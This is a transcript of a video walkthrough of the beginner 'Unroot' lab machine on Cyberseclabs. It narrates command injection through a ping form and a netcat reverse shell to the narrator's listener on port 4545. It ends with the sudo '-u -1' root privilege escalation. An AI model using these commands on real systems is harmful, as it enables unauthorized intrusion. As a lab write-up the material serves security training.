Welcome back. In today's video, we will be carrying on Cyberseclabs. Today's machine is Unroot, and as you can see, I powered on the machine, and the operating system is given clearly Linux. Okay. So this machine, I have scanned this machine with Nmap as we do every time. But a quick note before we carry on our testing. This machine is absolutely easy. It's elementary level. So if you are a beginner to this field, or if you are preparing for offensive security certified professional, these kind of machines are good for refreshing your knowledge or to learn something that you may have missed in the past. These things that are classified as introductory level and the same kind of things that we may miss during the offensive security professional exam, right? Or even in real life when you get advanced in your career, in your pen testing or cybersecurity, some elementary level stuff could be missed, right? When you are swamped with all the advanced stuff. I hope this is the case. Okay, so I run nmap scan here, and I used a scripting engine scan for services and their versions, and here disable ping discovery. And we found the IP address. This is the IP address of the lab machine, given, of course. You don't need to do any live host check. So when I first ran the scan, I found some weird results. Like port 22 is open, but the state of the service is TCP wrapped. There's no clear indication what this is, right? Port 80 is open, right? And of course, it is TCP route. We don't know what the service is. And I got a bunch of ports, but they are filtered. So I decided there is something wrong with my scan. So I decided to switch to Stealth scan. So here is the new scan, the new version. So here for scripting engine, and this is for the Stealth scan to do some evasion, right? Not total evasion of firewalls. And here host discovery disabled, and this is the IP. And I got some results. So this is the port 22, and this is the service SSH. And here I got port 80, and the protocol is HTTP. And here we got some fingerprints about the application running on the web server, which is phpMyAdmin. Now, if I go to Firefox, okay, so here, when I type the IP, I will see login interface. So every time we encounter a login interface like that, it comes to our mind to try default credentials. So if we try admin, seems like I lost my VPN connection. Let me check. Restart the connection. Let's go back. Refresh. Resend. Uh, can't log into the MySQL server. So here the password is wrong. Admin password. And this also did not work. So when you encounter a login interface like that, you may try with some default credentials, but don't just get caught up in the process of brute forcing the login username and password, because this would thwart your pen testing um, the subsequent stages. I mean, the firewall might flag your IP address and you won't be able to continue enumerating down the road. That's why just try with some default credentials. If that didn't work, it means you need to keep this aside for brute forcing tasks after you have exhausted your other options. And now we don't have any other option here, right? We only have phpMyAdmin. What the fuck? So what we would do here, I used directory buster. So directory sudo, or you can use gobuster. Of course, it's gonna launch the GUI. So here we type the IP address. We take the IP, right here, go back. All right. So here to put the IP address and here the word list. So we're gonna browse. I'm gonna tell you what was the word list that worked. So we go to user, share, and all the way slide all the way to the right until you reach word lists. So where the hell is word lists? All right, so this is word list. Choose directory buster and choose the one Apache user enum10.txt. You select that and you run, right? I'm not gonna run that. It's gonna take some time to exhaust the word list before it gives us the results. So use this word list to remember that Apache user enum. And let me close that. And the directory that you will find is dev. So dev. All right, so we see here two files. We have info and ping test. So when you click on info, it's clearly a page that shows the PHP info, right? The version, the other stuff. So here it's clear to us that the version running on Apache here. So you can search for um, here version. So here's the Linux. I don't think this is the right version. All right, it could be. And here is PHP.7, 7.0. Quite not bad, right? Not bad to have 7.0, but if you are running for hosting websites and the backend version, the backend programming language is PHP, you better upgrade from PHP 7 to at least PHP 7.2, 7.1, 7.4 preferably. Okay, so this seems not too much fruitful, so we go back. So here we have something interesting, ping test. Upon clicking on that, I can see host to ping, right? And if you have some practice with these kind of stuff, something would jump right to your mind that to try some command injection, right? So here, if I type the IP and I put semicolon, why semicolon here? Because semicolon allows me to run second command here, right after the IP address, without the condition that the first one must be true. So if this one is false, I can run a second command without any problem. So I type ls run. So it's pinging. Let's cancel that to something like that. Okay. So here we see the ping results, and we can see here the files in the current working directory. So the command execution has succeeded. So if we take a look at the here, oh, okay, view page source, post. So here we take the post request and name is IP run. Okay, so let's take a look at the code from inspect element. So as you can see, a form, right? And the form contains one input area, which is the IP address. And after that, it gets executed with the ping functionality. But I'm not sure this is the thing that I wanted. Okay, nevertheless, so it seems to me that whatever we run in the box here gets executed without any kind of input sanitization, which brings us to the point of talking about the application penetration testing or application attacks, OWASP. So the OWASP here is command injection, since we were able to launch our own commands. So here, what we can do here, we can type semicolon and type more commands like ID, and we can see the current ID of the current user. Again, VPN connection. I don't know. I'm all it. I guess nothing about this VPN connection. Okay, go back. Recent. So here you can see the ID, right, which is Joey. So Joey here got the GID 1000 and username is Joey. So we can upgrade that to reverse shell. So you can go back to the terminal, and on the right I can launch nc-lvp 4545. Very easy. Okay, so you go back here, we type semicolon nc 10 the IP address to connect to 16.45.45-e bin bash. Let's hope this run okay. Nope. If we cancel that, like that, run, didn't work. Okay, so in this case, we may need to go to pentest monkey and grab some reverse shell. So pentest monkey reverse shell. Nope, this one. I don't know. I don't want why. I don't know why it keeps showing me the GitHub pentest monkey. Yes. Okay. I don't know why Google Chrome keeps showing us this warning about pentest monkey. It is the damn algorithm. The damn algorithm. All right. So here we got a couple of options. We can try with Bash, Perl, Python. It all depends on the environment. If the environment here doesn't have Python installed, the Python reversal won't work. The same goes for PHP, and so is Perl. So we can first try with, well, I tried with Netcat. Netcat didn't work. Maybe we try with that. Let's try with this. So we change first the IP. It's going to be 10, 10, 0, 16, and the port will be 4545. 4545. Let's try that. Semicolon, paste, run. Gosh, the GPN. Do that, run. Oh, nothing. Okay. Let's go back and try to use, let's try to use Bash. Bash definitely should work. So here the IP is 10, 0, 16, and the port is 4545. Let's do that, fellas. Run. Oh, so here we, let me run that again. Okay, let's try with PHP, as PHP is installed on the remote host, so PHP reverse shell must work. Let's grab that, copy it here, and the IP needs to be our IP address, 10.0.16, the port is 4545, Control A, copy, semicolon, run. Oh, seems like we got something here. Yes, so as expected. So ID, that is great. So here, let's get something done here. So collapse that terminal, and we see here. Okay, so we are Dewey, and the first thing we do, guys, all the time when we enumerate for Linux privilege escalation is to find the files, sorry, the binaries that have the suit bit set. So find, let's type uh, and the first thing we do all the time when we enumerate for Linux privilege escalation is to find or trying to find what are the binaries that have the suit bit set, right? Suit bit set, as a reminder, it means that this binary can be run as its owner. We catch the connection. All right. Now it's going to be find perm, and the permission will be dash u equal s, and the type will be find to, and all the errors will pipe it to dev null. Let's see. So all of these binaries have the set, the sudo bit set. So we have gpassword, password. We have sudo. That is interesting. So we can run sudo as its owner. All right. So let's see who is the owner of this. Definitely the root, right? ls-la or file, or what's gonna be? Yeah, file user bin sudo. So here we got divert 64-bit, and yeah, that's it. So ls-la bin user bin, and here grep sudo. Cannot access user bin. Oh, okay. So ls-la user bin by grep sudo. So sudo is owned by root, right? As you can see here, the user is root and the group is root. As you can see, the set here, the sudo bit is set on the binary, which means we are as a GUI. GUI can run sudo as the root user, right? So what we can do here actually, we lost the connection now. Come on. Okay, so we restored the connection. All right, so now this guy over here can run any command, right? Can run sudo as root, right? So what can we do with this actually? So basically here, if we are to run sudo bin bash, right? So if we run that, it's gonna run sudo as the root, but definitely here, I don't think if we run that, it will give us the root user. Given the fact we run that as sudo as the root user, but I don't think we are in the sudoers group. That's why we cannot do that. So here cat etc sudoers. Oh, so we can't do that. Sudo cat etc sudoers. All right. So we can't know if GUI is within the group sudoers, right? So if GUI is within this group, right? So if we run sudo bin bash, where was the command? Where was it? So if we run sudo bin bash now, no TTY present and no ask pass program specified. It can't work. My guess is GUI here is not within the sudoers group, right? But she can run sudo as root, but she is not in the sudoers group. So one way to do that is there is an exploit for this situation. So sudo back then had a bug where it can run as root, right? And here, if we go back to the exploit, so this is the exploit. So here sudo, if we type this, so normally sudo checks on the user ID. If the user ID is within the sudo words group, it's gonna ask for the password or run without the password, depending on the situation. But sometimes, or in this exploit, sudo here doesn't check on the provided ID, right? Doesn't check. So if we type here the ID of dash or -1, it's not gonna find. It's gonna say, yeah, -1. There is no user has the ID of -1. So I'm gonna run under the current user, right? Whoever is the ID. So which means given the fact that sudo here has the sudo bit set, its own user is root, right? So the only way to get this to run as root is to type this. So here we say run as root user, but with the ID of -1, right? So here it's going to say no, -1 doesn't exist. So because it doesn't exist, I'm not going to check anyway. I'm just going to run the bin bash with the current user, which is root. That's the flow here. So if you take that and go back, type this, I'm going to try, look, so the ID of Joey here is 1000, right? So let's try with 1000 for a second. Here, when we run this command here, it's going to say, hey, so 1000 is an ID that is attached to Joey, right? So I can't run this. So if we run, and we lost the connection. Look at that, restart. Okay, go back. Let's see here. So as you can see, we were able to run that, right? But if we type ID, our ID is still Joey, right? Why? Because I told sudo, right, to run bin bash under the current user, which has the ID 1000, which is Joey here, right? And now, if I type a non-existent ID, like -1, what's going to happen is it's going to say -1 doesn't exist, so I'm going to run it under the current user. Let's see that. Okay, so if I run here sudo -u -1 bin bash, here it's going to say no -1 in the file system, right? There is no user which has -1 or whose ID is -1. So I'm going to run that under the current user, which owns or who owns the sudo, which happens to be root. So here, this one will give us root access. So we type enter. I guess why. I guess why that has happened. ID. So as you can see now, we are root, right? So that concludes the video. I hope you enjoyed the info and try it on your own and give me your thoughts. Thank you so much and see you in the next video.